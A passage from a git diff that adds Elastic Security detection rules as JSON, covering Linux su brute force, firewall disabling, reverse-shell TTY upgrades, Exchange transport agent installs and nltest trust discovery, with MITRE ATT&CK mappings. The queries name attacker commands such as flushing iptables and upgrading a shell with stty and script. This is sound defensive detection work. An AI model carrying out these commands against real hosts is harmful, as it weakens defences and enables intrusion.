"reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "827f8d8f-4117-4ae4-b551-f56d54b9da6b_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_5.json b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_5.json new file mode 100644 index 00000000000..7e22c207d10 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_5.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple consecutive login attempts executed by one process targeting a local linux user account within a short time interval. Adversaries might brute force login attempts across different users with a default wordlist or a set of customly crafted passwords in an attempt to gain access to these accounts.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Local Account Brute Force Detected", + "query": "sequence by host.id, process.parent.executable, user.id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name == \"su\" and \n not process.parent.name in (\n \"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"clickhouse-server\", \"ma\", \"gitlab-runner\",\n \"updatedb.findutils\", \"cron\"\n )\n ] with runs=10\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "835c0622-114e-40b5-a346-f843ea5d01f1", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "835c0622-114e-40b5-a346-f843ea5d01f1_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_6.json b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_6.json new file mode 100644 index 00000000000..6361bcece18 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_6.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple consecutive login attempts executed by one process targeting a local linux user account within a short time interval. Adversaries might brute force login attempts across different users with a default wordlist or a set of customly crafted passwords in an attempt to gain access to these accounts.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Local Account Brute Force Detected", + "query": "sequence by host.id, process.parent.executable, user.id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name == \"su\" and \n not process.parent.name in (\n \"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"clickhouse-server\", \"ma\", \"gitlab-runner\",\n \"updatedb.findutils\", \"cron\"\n )\n ] with runs=10\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "835c0622-114e-40b5-a346-f843ea5d01f1", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "835c0622-114e-40b5-a346-f843ea5d01f1_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_6.json b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_6.json new file mode 100644 index 00000000000..73ffce73fdc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_6.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may attempt to disable the iptables or firewall service in an attempt to affect how a host is allowed to receive or send network traffic.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Attempt to Disable IPTables or Firewall", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\n (\n /* disable FW */\n (\n (process.name == \"ufw\" and process.args == \"disable\") or\n (process.name == \"iptables\" and process.args == \"-F\" and process.args_count == 2)\n ) or\n\n /* stop FW service */\n (\n ((process.name == \"service\" and process.args == \"stop\") or\n (process.name == \"chkconfig\" and process.args == \"off\") or\n (process.name == \"systemctl\" and process.args in (\"disable\", \"stop\", \"kill\"))) and\n process.args in (\"firewalld\", \"ip6tables\", \"iptables\")\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_7.json b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_7.json new file mode 100644 index 00000000000..c4e11744787 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_7.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may attempt to disable the iptables or firewall service in an attempt to affect how a host is allowed to receive or send network traffic.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Attempt to Disable IPTables or Firewall", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\n (\n /* disable FW */\n (\n (process.name == \"ufw\" and process.args == \"disable\") or\n (process.name == \"iptables\" and process.args == \"-F\" and process.args_count == 2)\n ) or\n\n /* stop FW service */\n (\n ((process.name == \"service\" and process.args == \"stop\") or\n (process.name == \"chkconfig\" and process.args == \"off\") or\n (process.name == \"systemctl\" and process.args in (\"disable\", \"stop\", \"kill\"))) and\n process.args in (\"firewalld\", \"ip6tables\", \"iptables\")\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_3.json b/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_3.json new file mode 100644 index 00000000000..74cc36f4b72 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_3.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to Microsoft Exchange Transport Agents install. Adversaries may leverage malicious Microsoft Exchange Transport Agents to execute tasks in response to adversary-defined criteria, establishing persistence.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft Exchange Transport Agent Install Script", + "query": "event.category: \"process\" and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"Install-TransportAgent\" or\n \"Enable-TransportAgent\"\n )\n ) and\n not user.id : \"S-1-5-18\" and\n not powershell.file.script_block_text : (\n \"'Install-TransportAgent', 'Invoke-MonitoringProbe', 'Mount-Database', 'Move-ActiveMailboxDatabase',\" or\n \"'Enable-TransportAgent', 'Enable-TransportRule', 'Export-ActiveSyncLog', 'Export-AutoDiscoverConfig',\" or\n (\"scriptCmd.GetSteppablePipeline\" and \"ForwardHelpTargetName Install-TransportAgent\")\n )\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "846fe13f-6772-4c83-bd39-9d16d4ad1a81", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\nSteps to implement the logging policy via registry:\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.002", + "name": "Transport Agent", + "reference": "https://attack.mitre.org/techniques/T1505/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 3 + }, + "id": "846fe13f-6772-4c83-bd39-9d16d4ad1a81_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_4.json b/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_4.json new file mode 100644 index 00000000000..94d22156ad0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_4.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to Microsoft Exchange Transport Agents install. Adversaries may leverage malicious Microsoft Exchange Transport Agents to execute tasks in response to adversary-defined criteria, establishing persistence.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft Exchange Transport Agent Install Script", + "query": "event.category: \"process\" and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"Install-TransportAgent\" or\n \"Enable-TransportAgent\"\n )\n ) and\n not user.id : \"S-1-5-18\" and\n not powershell.file.script_block_text : (\n \"'Install-TransportAgent', 'Invoke-MonitoringProbe', 'Mount-Database', 'Move-ActiveMailboxDatabase',\" or\n \"'Enable-TransportAgent', 'Enable-TransportRule', 'Export-ActiveSyncLog', 'Export-AutoDiscoverConfig',\" or\n (\"scriptCmd.GetSteppablePipeline\" and \"ForwardHelpTargetName Install-TransportAgent\")\n )\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "846fe13f-6772-4c83-bd39-9d16d4ad1a81", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\nSteps to implement the logging policy via registry:\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.002", + "name": "Transport Agent", + "reference": "https://attack.mitre.org/techniques/T1505/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 4 + }, + "id": "846fe13f-6772-4c83-bd39-9d16d4ad1a81_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_3.json b/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_3.json new file mode 100644 index 00000000000..774be85bac6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_3.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a non-interactive terminal (tty) is being upgraded to a fully interactive shell. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host, in order to obtain a more stable connection.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Upgrade of Non-interactive Shell", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and (\n (process.name == \"stty\" and process.args == \"raw\" and process.args == \"-echo\" and process.args_count >= 3) or\n (process.name == \"script\" and process.args in (\"-qc\", \"-c\") and process.args == \"/dev/null\" and \n process.args_count == 4)\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "84d1f8db-207f-45ab-a578-921d91c23eb2", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "84d1f8db-207f-45ab-a578-921d91c23eb2_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_110.json b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_110.json new file mode 100644 index 00000000000..8c61dff5106 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_110.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of nltest.exe for domain trust discovery purposes. Adversaries may use this command-line utility to enumerate domain trusts and gain insight into trust relationships, as well as the state of Domain Controller (DC) replication in a Microsoft Windows NT Domain.", + "false_positives": [ + "Domain administrators may use this command-line utility for legitimate information gathering purposes, but it is not common for environments with Windows Server 2012 and newer." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enumerating Domain Trusts via NLTEST.EXE", + "note": "## Triage and analysis\n\n### Investigating Enumerating Domain Trusts via 